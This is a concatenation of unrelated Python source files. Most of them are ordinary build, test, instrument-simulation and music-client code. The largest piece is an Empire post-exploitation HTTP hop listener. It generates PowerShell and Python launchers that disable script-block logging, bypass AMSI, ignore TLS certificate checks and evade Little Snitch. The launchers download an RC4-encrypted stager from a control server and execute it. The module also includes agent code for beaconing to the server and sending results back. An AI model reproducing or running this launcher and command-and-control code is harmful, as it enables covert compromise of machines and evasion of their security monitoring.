removal_version='1.9.0.dev0',
removal_hint='Use `--scala-scalac-plugin-dep` instead.',
help='Search for scalac plugins here, as well as in any '
'explicit dependencies.')
@classmethod
def product_types(cls):
return ['runtime_classpath', 'zinc_analysis', 'zinc_args']
def select(self, target):
# Require that targets are marked for JVM compilation, to differentiate from
# targets owned by the scalajs contrib module.
if not isinstance(target, JvmTarget):
return False
return target.has_sources('.java') or target.has_sources('.scala')
def select_source(self, source_file_path):
return source_file_path.endswith('.java') or source_file_path.endswith('.scala')
def execute(self):
if JvmPlatform.global_instance().get_options().compiler == 'zinc':
return super(ZincCompile, self).execute()
| |
# -*- coding: utf-8 -*-
import os
from babelfish import Language, language_converters
import pytest
from vcr import VCR
from subliminal.providers.tvsubtitles import TVsubtitlesProvider, TVsubtitlesSubtitle
vcr = VCR(path_transformer=lambda path: path + '.yaml',
record_mode=os.environ.get('VCR_RECORD_MODE', 'once'),
match_on=['method', 'scheme', 'host', 'port', 'path', 'query', 'body'],
cassette_library_dir=os.path.realpath(os.path.realpath(os.path.join('tests', 'cassettes', 'tvsubtitles'))))
@pytest.mark.converter
def test_converter_convert_alpha3_country():
assert language_converters['tvsubtitles'].convert('por', 'BR') == 'br'
@pytest.mark.converter
def test_converter_convert_alpha3():
assert language_converters['tvsubtitles'].convert('ukr') == 'ua'
@pytest.mark.converter
def test_converter_convert_alpha3_alpha2_converter():
assert language_converters['tvsubtitles'].convert('fra') == 'fr'
@pytest.mark.converter
def test_converter_reverse():
assert language_converters['tvsubtitles'].reverse('gr') == ('ell',)
@pytest.mark.converter
def test_converter_reverse_name_converter():
assert language_converters['tvsubtitles'].reverse('en') == ('eng', None, None)
def test_get_matches_format_release_group(episodes):
subtitle = TVsubtitlesSubtitle(Language('fra'), None, 249518, 'The Big Bang Theory', 7, 5, 2007, 'HDTV',
'lol-dimension')
matches = subtitle.get_matches(episodes['bbt_s07e05'])
assert matches == {'series', 'season', 'episode', 'year', 'country', 'source', 'release_group'}
def test_get_matches_format_equivalent_release_group(episodes):
subtitle = TVsubtitlesSubtitle(Language('fra'), None, 249518, 'The Big Bang Theory', 7, 5, 2007, 'HDTV',
'lol')
matches = subtitle.get_matches(episodes['bbt_s07e05'])
assert matches == {'series', 'season', 'episode', 'year', 'country', 'source', 'release_group'}
def test_get_matches_video_codec_resolution(episodes):
subtitle = TVsubtitlesSubtitle(Language('por'), None, 261077, 'Game of Thrones', 3, 10, None, '720p.BluRay',
'x264-DEMAND')
matches = subtitle.get_matches(episodes['got_s03e10'])
assert matches == {'series', 'season', 'episode', 'year', 'country', 'video_codec', 'resolution'}
def test_get_matches_only_year_country(episodes):
subtitle = TVsubtitlesSubtitle(Language('por'), None, 261077, 'Game of Thrones', 3, 10, None, '1080p.BluRay',
'DEMAND')
matches = subtitle.get_matches(episodes['bbt_s07e05'])
assert matches == {'year', 'country'}
def test_get_matches_no_match(episodes):
subtitle = TVsubtitlesSubtitle(Language('por'), None, 261077, 'Game of Thrones', 3, 10, 2011, '1080p.BluRay',
'DEMAND')
matches = subtitle.get_matches(episodes['house_of_cards_us_s06e01'])
assert matches == set()
@pytest.mark.integration
@vcr.use_cassette
def test_search_show_id():
with TVsubtitlesProvider() as provider:
show_id = provider.search_show_id('The Big Bang Theory')
assert show_id == 154
@pytest.mark.integration
@vcr.use_cassette
def test_search_show_id_incomplete():
with TVsubtitlesProvider() as provider:
show_id = provider.search_show_id('The Big Bang')
assert show_id is None
@pytest.mark.integration
@vcr.use_cassette
def test_search_show_id_ambiguous():
with TVsubtitlesProvider() as provider:
show_id = provider.search_show_id('New Girl')
assert show_id == 977
@pytest.mark.integration
@vcr.use_cassette
def test_search_show_id_us():
with TVsubtitlesProvider() as provider:
show_id = provider.search_show_id('House of Cards', 2013)
assert show_id == 1246
@pytest.mark.integration
@vcr.use_cassette
def test_search_show_id_uk():
with TVsubtitlesProvider() as provider:
show_id = provider.search_show_id('Beautiful People')
assert show_id == 657
@pytest.mark.integration
@vcr.use_cassette
def test_search_show_id_no_year():
with TVsubtitlesProvider() as provider:
show_id = provider.search_show_id('Dallas')
assert show_id == 646
@pytest.mark.integration
@vcr.use_cassette
def test_search_show_id_year_in_title():
with TVsubtitlesProvider() as provider:
show_id = provider.search_show_id('Dallas', 2012)
assert show_id == 1127
@pytest.mark.integration
@vcr.use_cassette
def test_search_show_id_error():
with TVsubtitlesProvider() as provider:
show_id = provider.search_show_id('The Big How I Met Your Mother')
assert show_id is None
@pytest.mark.integration
@vcr.use_cassette
def test_get_episode_ids():
expected_episode_ids = {1: 34274, 2: 34275, 3: 34276, 4: 34277, 5: 34849, 6: 34923, 7: 35022, 8: 35023, 9: 35436,
10: 35503, 11: 35887, 12: 36369, 13: 36513, 14: 36610, 15: 36718, 16: 36795, 17: 37152,
18: 37153, 19: 37407, 20: 37863, 21: 38218, 22: 38574, 23: 38686, 24: 38687}
with TVsubtitlesProvider() as provider:
episode_ids = provider.get_episode_ids(154, 5)
assert episode_ids == expected_episode_ids
@pytest.mark.integration
@vcr.use_cassette
def test_get_episode_ids_wrong_season():
with TVsubtitlesProvider() as provider:
episode_ids = provider.get_episode_ids(154, 55)
assert len(episode_ids) == 0
@pytest.mark.integration
@vcr.use_cassette
def test_query(episodes):
video = episodes['bbt_s07e05']
expected_subtitles = {268673, 249733, 249518, 249519, 249714, 32596, 249590, 249592, 249499, 261214}
with TVsubtitlesProvider() as provider:
show_id = provider.search_show_id(video.series, video.year)
subtitles = provider.query(show_id, video.series, video.season, video.episode, video.year)
assert {subtitle.subtitle_id for subtitle in subtitles} == expected_subtitles
@pytest.mark.integration
@vcr.use_cassette
def test_query_no_year(episodes):
video = episodes['dallas_s01e03']
expected_subtitles = {124753}
with TVsubtitlesProvider() as provider:
show_id = provider.search_show_id(video.series, video.year)
subtitles = provider.query(show_id, video.series, video.season, video.episode, video.year)
assert {subtitle.subtitle_id for subtitle in subtitles} == expected_subtitles
@pytest.mark.integration
@vcr.use_cassette
def test_query_wrong_series(episodes):
video = episodes['bbt_s07e05']
with TVsubtitlesProvider() as provider:
subtitles = provider.query(155, video.series[:12], video.season, video.episode, video.year)
assert len(subtitles) == 0
@pytest.mark.integration
@vcr.use_cassette
def test_query_wrong_episode(episodes):
video = episodes['bbt_s07e05']
with TVsubtitlesProvider() as provider:
show_id = provider.search_show_id(video.series, video.year)
subtitles = provider.query(show_id, video.series, video.season, 55, video.year)
assert len(subtitles) == 0
@pytest.mark.integration
@vcr.use_cassette
def test_list_subtitles(episodes):
video = episodes['bbt_s07e05']
languages = {Language('eng'), Language('fra')}
expected_subtitles = {249592, 249499, 32596, 249518}
with TVsubtitlesProvider() as provider:
subtitles = provider.list_subtitles(video, languages)
assert {subtitle.subtitle_id for subtitle in subtitles} == expected_subtitles
assert {subtitle.language for subtitle in subtitles} == languages
assert subtitles[0].release == 'The Big Bang Theory 7x05 (HDTV.LOL)'
@pytest.mark.integration
@vcr.use_cassette
def test_download_subtitle(episodes):
video = episodes['bbt_s07e05']
languages = {Language('eng'), Language('fra')}
with TVsubtitlesProvider() as provider:
subtitles = provider.list_subtitles(video, languages)
provider.download_subtitle(subtitles[0])
assert subtitles[0].content is not None
assert subtitles[0].is_valid() is True
@pytest.mark.integration
@vcr.use_cassette
def test_list_subtitles_episode_alternative_series(episodes):
video = episodes['turn_s03e01']
languages = {Language('fra')}
expected_subtitles = {307588}
with TVsubtitlesProvider() as provider:
subtitles = provider.list_subtitles(video, languages)
assert {subtitle.subtitle_id for subtitle in subtitles} == expected_subtitles
assert {subtitle.language for subtitle in subtitles} == languages
| |
import base64
import random
import os
import errno
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S] Hop',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'http_hop'
},
'RedirectListener' : {
'Description' : 'Existing listener to redirect the hop traffic to.',
'Required' : True,
'Value' : ''
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'RedirectStagingKey' : {
'Description' : 'The staging key for the redirect listener, extracted from RedirectListener automatically.',
'Required' : False,
'Value' : ''
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : ''
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : 80
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent, extracted from RedirectListener automatically.',
'Required' : False,
'Value' : ''
},
'OutFolder' : {
'Description' : 'Folder to output redirectors to.',
'Required' : True,
'Value' : '/tmp/http_hop/'
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
def default_response(self):
"""
If there's a default response expected from the server that the client needs to ignore,
(i.e. a default HTTP page), put the generation here.
"""
return ''
def validate_options(self):
"""
Validate all options for this listener.
"""
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print helpers.color("[!] Option \"%s\" is required." % (key))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print helpers.color('[!] listeners/http_hop generate_launcher(): no language specified!')
if listenerName and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['RedirectStagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
stager += helpers.randomize_capitalization("$GPF=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(");If($GPF){$GPC=$GPF.GetValue($null);If($GPC")
stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("){$GPC")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPC")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("$val=[Collections.Generic.Dictionary[string,System.Object]]::new();$val.Add")
stager += "('EnableScriptB'+'lockLogging',0);"
stager += helpers.randomize_capitalization("$val.Add")
stager += "('EnableScriptBlockInvocationLogging',0);"
stager += helpers.randomize_capitalization("$GPC")
stager += "['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("=$val}")
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
stager += "'System.Management.Automation.AmsiUtils'"
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
userAgent = profile.split('|')[1]
stager += "$u='"+userAgent+"';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$wc.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy;")
stager += helpers.randomize_capitalization("$proxy.Address = '"+ proxy.lower() +"';")
stager += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
domain = username.split('\\')[0]
usr = username.split('\\')[1]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
# TODO: reimplement stager retries?
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"Cookie\",\"session=%s\");" % (b64RoutingPacket)
stager += "$ser='%s';$t='%s';" % (host, stage0)
stager += helpers.randomize_capitalization("$data=$WC.DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if 'https' in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n"
launcherBase += "out = ps.stdout.read()\n"
launcherBase += "ps.stdout.close()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stagger: " + str(e)
print helpers.color(p, color='red')
if userAgent.lower() == 'default':
userAgent = profile.split('|')[1]
launcherBase += "o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener();"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (b64RoutingPacket)
launcherBase += "import urllib2\n"
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n"
else:
proto = proxy.Split(':')[0]
launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "o = urllib2.build_opener();\n"
#install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=o.open(server+t).read();"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase)
launcher = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded)
return launcher
else:
return launcherBase
else:
print helpers.color("[!] listeners/http_hop generate_launcher(): invalid language specification: only 'powershell' and 'python' are current supported for this module.")
else:
print helpers.color("[!] listeners/http_hop generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
If you want to support staging for the listener module, generate_stager must be
implemented to return the stage1 key-negotiation stager code.
"""
print helpers.color("[!] generate_stager() not implemented for listeners/http_hop")
return ''
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
If you want to support staging for the listener module, generate_agent must be
implemented to return the actual staged agent code.
"""
print helpers.color("[!] generate_agent() not implemented for listeners/http_hop")
return ''
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
getTask = """
function script:Get-Task {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$wc.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)}
$wc.Headers.Add("Cookie", "session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $wc.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
function script:Send-Message {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$wc.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
try{
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $wc.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets)
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff info a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket)
headers['Cookie'] = "session=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
except urllib2.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print helpers.color("[!] listeners/http_hop generate_comms(): invalid language specification, only 'powershell' and 'python' are current supported for this module.")
else:
print helpers.color('[!] listeners/http_hop generate_comms(): no language specified!')
def start(self, name=''):
"""
Nothing to actually start for a hop listner, but ensure the stagingKey is
synced with the redirect listener.
"""
redirectListenerName = self.options['RedirectListener']['Value']
redirectListenerOptions = helpers.get_listener_options(redirectListenerName)
if redirectListenerOptions:
self.options['RedirectStagingKey']['Value'] = redirectListenerOptions['StagingKey']['Value']
self.options['DefaultProfile']['Value'] = redirectListenerOptions['DefaultProfile']['Value']
redirectHost = redirectListenerOptions['Host']['Value']
uris = [a for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
hopCodeLocation = "%s/data/misc/hop.php" % (self.mainMenu.installPath)
f = open(hopCodeLocation, 'r')
hopCode = f.read()
f.close()
hopCode = hopCode.replace('REPLACE_SERVER', redirectHost)
hopCode = hopCode.replace('REPLACE_HOP_NAME', self.options['Name']['Value'])
saveFolder = self.options['OutFolder']['Value']
for uri in uris:
saveName = "%s%s" % (saveFolder, uri)
# recursively create the file's folders if they don't exist
if not os.path.exists(os.path.dirname(saveName)):
try:
os.makedirs(os.path.dirname(saveName))
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
with open(saveName, 'w') as f:
f.write(hopCode)
print helpers.color("[*] Hop redirector written to %s . Place this file on the redirect server." % (saveName))
return True
else:
print helpers.color("[!] Redirect listener name %s not a valid listener!" % (redirectListenerName))
return False
def shutdown(self, name=''):
"""
Nothing to actually shut down for a hop listner.
"""
pass
| |
# vi: ts=4 sw=4
'''
:mod:`ophyd.controls.cas.motor` - CAS motors
==================================================
.. module:: ophyd.controls.cas.motor
:synopsis: Epics motor-record simulation using the ophyd Channel Access
Server
'''
from __future__ import print_function
from .pv import CasRecord
from .errors import casAsyncCompletion
from ..positioner import (Positioner, )
from ..pseudopos import (PseudoPositioner, )
STATUS_BITS = {'direction': 0, # last raw direction; (0:Negative, 1:Positive)
'done': 1, # motion is complete.
'plus_ls': 2, # plus limit switch has been hit.
'homels': 3, # state of the home limit switch.
'position': 5, # closed-loop position control is enabled.
'slip_stall': 6, # Slip/Stall detected (eg. fatal following error)
'home': 7, # if at home position.
'enc_present': 8, # encoder is present.
'problem': 9, # driver stopped polling, or hardware problem
'moving': 10, # non-zero velocity present.
'gain_support': 11, # motor supports closed-loop position control.
'comm_err': 12, # Controller communication error.
'minus_ls': 13, # minus limit switch has been hit.
'homed': 14, # the motor has been homed.
}
class CasMotor(CasRecord):
'''A fake EPICS motor record, made available to EPICS by the built-in
channel access server.
Keyword arguments are passed to the base class, CasRecord
Parameters
----------
name : str
The record name (not including the server prefix)
positioner : Positioner
The ophyd :class:`Positioner` to expose to EPICS
tweak_value : float
The default tweak value
'''
_rtype = 'motor'
_fld_readback = 'RBV'
_fld_tweak_fwd = 'TWF'
_fld_tweak_rev = 'TWR'
_fld_tweak_val = 'TWV'
_fld_egu = 'EGU'
_fld_moving = 'MOVN'
_fld_done_move = 'DMOV'
_fld_stop = 'STOP'
_fld_status = 'MSTA'
_fld_low_lim = 'LLS'
_fld_high_lim = 'HLS'
_fld_calib_set = 'SET'
_fld_limit_viol = 'LVIO'
def __init__(self, name, positioner,
tweak_value=1.0,
**kwargs):
if not isinstance(positioner, Positioner):
raise ValueError('The positioner must be derived from Positioner')
elif isinstance(positioner, PseudoPositioner):
if len(positioner.pseudos) > 1:
raise ValueError('Cannot use with multiple-pseudo positioner. '
'Instead, create CasMotors on individual axes.')
self._pos = positioner
self._status = 0
CasRecord.__init__(self, name, self._pos.position,
rtype=self._rtype, **kwargs)
self.add_field(self._fld_readback, self._pos.position)
self.add_field(self._fld_egu, self._pos.egu)
self.add_field(self._fld_tweak_val, tweak_value)
self.add_field(self._fld_tweak_fwd, 0, written_cb=self.tweak_forward)
self.add_field(self._fld_tweak_rev, 0, written_cb=self.tweak_reverse)
self.add_field(self._fld_stop, 0, written_cb=lambda **kwargs: self._pos.stop())
self.add_field(self._fld_moving, self._pos.moving)
self.add_field(self._fld_done_move, not self._pos.moving)
self.add_field(self._fld_status, 0)
self.add_field(self._fld_low_lim, 0)
self.add_field(self._fld_high_lim, 0)
self.add_field(self._fld_calib_set, 0)
self.add_field(self._fld_limit_viol, 0)
self._pos.subscribe(self._readback_updated, event_type=self._pos.SUB_READBACK)
self._pos.subscribe(self._move_started, event_type=self._pos.SUB_START)
self._pos.subscribe(self._move_done, event_type=self._pos.SUB_DONE)
self._update_status(moving=self._pos.moving)
def written_to(self, timestamp=None, value=None,
status=None, severity=None):
'''[CAS callback] CA client requested a move by writing to this record
(or .VAL)
'''
if status or severity:
return
if self._check_limits(value):
self._pos.move(value, wait=False,
moved_cb=lambda **kwargs: self.async_done())
raise casAsyncCompletion
def _check_limits(self, pos):
'''Check the position against the limits
Returns
-------
bool
False if the limits are tripped
'''
low_lim, high_lim = self._pos.limits
# TODO: better way to do this. also, limits on .VAL will only update
# when a move request has been started
self.limits.hilim = self.limits.hihi = self.limits.high = high_lim
self.limits.lolim = self.limits.lolo = self.limits.low = low_lim
if low_lim != high_lim:
if pos > high_lim:
self._update_status(minus_ls=0, plus_ls=1)
return False
elif pos < low_lim:
self._update_status(minus_ls=1, plus_ls=0)
return False
self._update_status(minus_ls=0, plus_ls=0)
return True
def tweak(self, amount):
'''Performs a tweak of positioner by `amount`.
The standard motor record behavior is to add the tweak value (.TWV)
onto the user-request value (.VAL) and move there.
'''
# pos = self._pos.position + amount
pos = self.value + amount
self.value = pos
if self._check_limits(pos):
self._pos.move(pos, wait=False)
def tweak_reverse(self, **kwargs):
'''[CAS callback] CA client requested to tweak reverse'''
tweak_val = self[self._fld_tweak_val].value
return self.tweak(-tweak_val)
def tweak_forward(self, **kwargs):
'''[CAS callback] CA client requested to tweak forward'''
tweak_val = self[self._fld_tweak_val].value
return self.tweak(tweak_val)
def _readback_updated(self, value=None, **kwargs):
'''[Pos callback] Positioner readback value has been updated'''
self[self._fld_readback] = value
def _move_started(self, **kwargs):
'''[Pos callback] Positioner motion has started'''
self._update_status(moving=1)
def _move_done(self, **kwargs):
'''[Pos callback] Positioner motion has completed'''
self._update_status(moving=0)
def _update_status(self, **kwargs):
'''Update the motor status field (MSTA)'''
old_status = self._status
for arg, value in kwargs.iteritems():
bit = STATUS_BITS[arg]
if value:
self._status |= (1 << bit)
else:
self._status &= ~(1 << bit)
field = self[self._fld_status]
if old_status != self._status:
field.value = self._status
moving = kwargs.get('moving', None)
if moving is not None:
self[self._fld_moving] = moving
self[self._fld_done_move] = not moving
plus_ls = kwargs.get('plus_ls', None)
if plus_ls is not None:
self[self._fld_high_lim] = plus_ls
minus_ls = kwargs.get('minus_ls', None)
if minus_ls is not None:
self[self._fld_low_lim] = minus_ls
| |
# -*- coding: utf-8 -*-
from urlparse import urlparse, parse_qsl
import gmusicapi
from gmusicapi.clients.shared import _Base
